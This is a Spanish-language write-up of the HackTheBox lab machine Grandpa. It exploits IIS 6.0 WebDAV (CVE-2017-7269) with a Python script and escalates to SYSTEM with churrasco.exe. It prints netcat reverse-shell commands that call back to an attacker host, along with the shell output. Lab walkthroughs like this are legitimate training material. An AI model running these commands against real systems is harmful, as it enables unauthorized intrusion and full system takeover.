HackTheBox - Grandpa
Posted 
Grandpa Machine Logo
By 1 min read
Máquina Windows de nivel Easy de HackTheBox.
Técnicas usadas: ISS 6.0 (CVE-2017-7269), Token Kidnapping Local Privilege Escalation (churrasco.exe)
Fase de Reconocimiento 🧣
a. Enumeramos los puertos que están abiertos.
nmap -p- -sS -Pn -n <IP> -oG puertos
b. Vemos las versiones de los servicios que se están ejecutando en los puertos abiertos
nmap -p<Puertos> -sCV <IP> -oN versiones
A diferencia de la Máquina Granny, aquí no tenemos el método PUT permitido, pero, tenemos el método
PROPFIND, po lo que buscaremos algún exploit.
c. Nos encontramos con este exploit
1
2
3
4
5
6
7
❯ python2 rce.py <IP Grandpa> 80 <tun0 IP> 443
❯ nc -lvnp 443
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>
Escalada de Privilegios 💹
a. La forma de escalar privilegios es la misma de la Máquina Granny
1
2
3
4
5
6
7
8
❯ ls
churrasco.exe nc.exe
---------------------------------------------------------------
C:\Temp>copy \\10.10.14.18\Share\nc.exe
C:\Temp>copy \\10.10.14.18\Share\churrasco.exe
C:\Temp>dir
09/15/2023 08:14 PM 31,232 churrasco.exe
09/15/2023 08:15 PM 36,528 nc.exe
b. Entablamos una reverse shell
1
2
3
4
5
6
7
8
C:\Temp>.\churrasco.exe -d "C:\Temp\nc.exe -e cmd 10.10.14.18 4445"
--------------------------------------------------------------------
❯ nc -lvnp 4445
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\TEMP>whoami
nt authority\system
This post is licensed under CC BY 4.0 by the author.